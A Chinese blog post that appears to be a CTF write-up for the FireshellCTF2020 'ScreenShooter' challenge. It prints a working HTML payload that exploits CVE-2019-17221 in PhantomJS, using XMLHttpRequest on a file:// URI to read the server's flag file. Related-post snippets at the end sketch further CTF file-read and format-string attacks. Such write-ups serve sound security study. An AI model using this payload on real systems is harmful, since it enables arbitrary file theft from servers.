[FireshellCTF2020]ScreenShooter

已于 2022-01-23 00:09:36 修改
阅读量4.1k 收藏 2
点赞数
分类专栏: CTF刷题记录 文章标签: CTF Web CVE-2019-17221
于 2022-01-22 23:23:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/120453003
版权

[FireshellCTF2020]ScreenShooter

知识点:CVE-2019-17221,任意文件读取

跟着师傅的wp做的

输入url,可以获取图标,比如我们输入http://www.baidu.com

在这里插入图片描述

然后去https://beeceptor.com/上生成一个临时的域名
在这里插入图片描述

让靶机去访问这个临时域名,然后我们可以查看请求头。注意请求的时候用http协议,然后才能看到请求的流量(一直用https看不到。。)

在这里插入图片描述

注意到其中的PhantomJS

PhantomJS

PhantomJS是什么

在这里插入图片描述

任意文件读取

找相应的漏洞,阿里云漏洞库 (aliyun.com)

在这里插入图片描述

注意其中的攻击者可借助特制的HTML文件利用该漏洞读取文件系统上任意文件

在漏洞数据库中的描述,NVD - CVE-2019-17221 (nist.gov)

在这里插入图片描述

可以使用file:// URI 的 XMLHttpRequest读取文件

编写一个index.html放在自己的vps上

<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>
<script type="text/javascript">
	sk1y = new XMLHttpRequest;
	sk1y.onload = function(){
		document.write(this.responseText)
	};
	sk1y.open("GET","file:///flag");
	sk1y.send();

</script>

</body>
</html>

然后去访问,得flag

在这里插入图片描述

参考链接

  1. NVD - CVE-2019-17221 (nist.gov)
  2. 阿里云漏洞库 (aliyun.com)
  3. [刷题FireshellCTF2020]ScreenShooter - kar3a - 博客园 (cnblogs.com)
Sk1y
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
前端样板和工作流FireShell.zip
07-18
FireShell 是一个比较轻率的框架,基于 HTML5, Grunt, Sass.为现代开发者而诞生. 对于团队和个人来说, 真是一个棒的开发流程管理工具. JavaScript可以运行,生成处理,自动压缩和文件关联, 用高级的HTML5来武装自己,使得它成为一个很牛X的框架. 它引用了部分HTML5,还有HTML5相关的一些原理,WAI-ARIA基线标记和实用的web. 适合小项目的css结构和定标器,独特的架构方式能缩小你写的对象形的css代码 . 还有很多灵活性比较强的文件夹结构层. 标签:FireShell  Web框架
BUUCTF--[FireshellCTF2020]ScreenShooter
qq_46263951的博客
08-26 594
进入页面后首先是让我们输入一个网址,当我们访问百度网址时它会返回百度网页的截图 看大佬的wp上是说这里存在的是CVE-2019-17221漏洞 PhantomJS 到 2.1.1 有一个任意文件读取漏洞,如 file:// URI 的 XMLHttpRequest 所示。该漏洞存在于网页模块的 page.open() 函数中,该函数加载指定的 URL 并调用给定的回调。攻击者可以提供特制的 HTML 文件作为用户输入,允许读取文件系统上的任意文件。例如,如果 page.render() ...
[FireshellCTF2020]Firehttpd
seaaseesa的博客
07-24 531
[FireshellCTF2020]Firehttpd 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在referer字段的解析里存在格式化字符串漏洞,由于是主进程fork子进程,因此,我们泄露的数据第二次不会改变仍然可以使用。 那么,我们利用格式化字符串漏洞,将文件名指针修改指向我们可控的地址,这样就可以读取我们想要的文件了。 #coding:utf8 from pwn import * ip = 'node3.buuoj.cn' port = 28726 sh = rem
[FireshellCTF2020]Caas
qq_62046696的博客
12-22 745
这里的 "" 和的区别是,#include 会直接读取系统中的,而""会先看本目录有没有,再去读取系统中。本来以为会是一个ssti模板,{{8*8}}却仍然还是报错,print echo 等输出都不行。然后想了一下,是因为识别了c的文件头包含了文件,然后可以下载,那么会不会存在任意读取漏洞呢。/tmp目录下的,class_7eamm1tu3.c后缀名是c,明显是c语言的标志。那么我们可以直接读取flag,#include "/flag"打开界面,是一个运行代码的*框,然后我们输入。
auto-screenshooter
03-21
自动屏幕截图 ...将client_id_template.json文件移至src/auto_screenshooter/client_id.json 建造 确保已安装Python 3.7+和poetry ,然后使用poetry install 。 要运行,只需执行auto-screenshooter
screenshooter
09-23
在xfce4下,可以使用xfce4-screenshooter命令进行截屏。通过执行命令"xfce4-screenshooter -f"可以实现全屏截图。为了创建截屏快捷键,你可以打开Application finder,输入"keyboard"并打开。然后点击"Application ...
ScreenShooter-crx插件
04-05
"ScreenShooter-crx插件"是一款专为网页截屏设计的浏览器扩展程序,它以简单易用的方式帮助用户快速捕获网页上的任何内容。这款插件特别适用于那些需要频繁进行网页截图的工作或学习场景,比如网页设计、内容编辑、...
CodingNinjas screenshooter-crx插件
04-01
语言:English CodingNinjas屏幕截图实用程序 CodingNinjas是网站所有者的Web维护工具。 此扩展使CodingNinjas客户可以直接从浏览器直接启动新的开发任务。 按“拍摄屏幕截图”按钮,描述您需要我们进行的更改,我们...
BUUCTF [FireshellCTF2020] Caas
Senimo
01-11 752
BUUCTF [FireshellCTF2020] Caas 考点: #include ''预处理编译报错 启动环境: 提示是一个代码编译功能,尝试输入<?php echo 'Hello'; ?>,得到了报错: 根据报错发现是C语言编译器,输入: #include <stdio.h> int main() { printf("Hello, World! \n"); return 0; } 编译后下载了一个文件: 开始以为和这个文件有关,但是后续尝试中发
推荐一款高效前端开发框架——FireShell
最新发布
gitblog_00064的博客
05-13 450
推荐一款高效前端开发框架——FireShell 项目地址:https://gitcode.com/toddmotto/fireshell 项目介绍 欢迎来到FireShell的世界!这是一个专门为现代开发者设计的前端快速启动模板和工作流程框架。无论你是团队的一员还是独立开发者,FireShell都能帮你构建更高效的工作流程。它集成了JavaScript任务运行、构建过程、自动化压缩和文件合并,并以...
Fireshell的使用说明
糯米糊糊的专栏
11-11 2666
今天花了半天时间, 研究了一下网上的一个叫做Fireshell的前端项目, 这个项目地址是:
fireshell 2019 Vice(ssrf)
wywwzjj
01-30 351
&amp;amp;amp;lt;?php //require_once 'config.php'; class SHITS{ private $url; private $method; private $addr; private $host; private $name; function __construct($method,$url){ $this-&amp;amp;amp;gt;method =...
FireShell WriteUp】Simple Encryption
古月浪子的博客
03-22 351
FireShell CTF的第一道逆向题 做的时候还卡了一下,丢人233333~ 用IDA打开,找一找main函数 因为没有符号表,而且有很多无关的代码,所以尝试着判断一下各个函数的功能,改一下名 现在可以比较清楚的看到程序的逻辑了,打开input_file,将字符串加密以后写入output_file 具体的加密方法就在while循环里,我们写一个逆向算法把加密后的flag解出来即可 in...
八月刷题总结
qq_46263951的博客
08-31 492
2021DASCTF July X CBCTF--cat flag 考察日志文件位置,escapeshellarg函数绕过 DASCTF July X CBCTF 4th--ezrceYAPI Mock远程代码执行漏洞 BUUCTF--[HarekazeCTF2019]Easy Notes SESSION反序列化 BUUCTF--[SWPU2019]Web3 伪造Session,生成linux中的软链接 BUUCTF--[watevrCTF-2019]Pickle Store Pickle反序列化漏
Axis搭建加漏洞RCE(含CVE-2019-0227)
GalaxySpaceX的博客
05-15 2692
Axis漏洞RCE,包含CVE-2019-0227
Apache 提权漏洞(CVE-2019-0211)复现
weixin_34186128的博客
04-13 1209
本月Apache被公布了一个提权的漏洞,并且前天在GitHub上公布出了利用脚本,这几天我负责漏洞应急这个漏洞。 本篇文章没有叫:《Apache 提权漏洞分析》是因为我觉得 CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation 这篇文章的分析写的挺好的,所以我没必要再翻译一遍了,本篇文章主要叙述复现该漏洞的过程中踩过的坑。 复现环...
Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法
jingde528的博客
11-05 989
Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法 CVE-2019-11477漏洞简单介绍https://cert.360.cn/warning/detail?id=27d0c6b825c75d8486c446556b9c9b68 RedHat用户可以使用以下脚本来检查系统是否存在漏洞https://access.redhat.com/sites/default...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值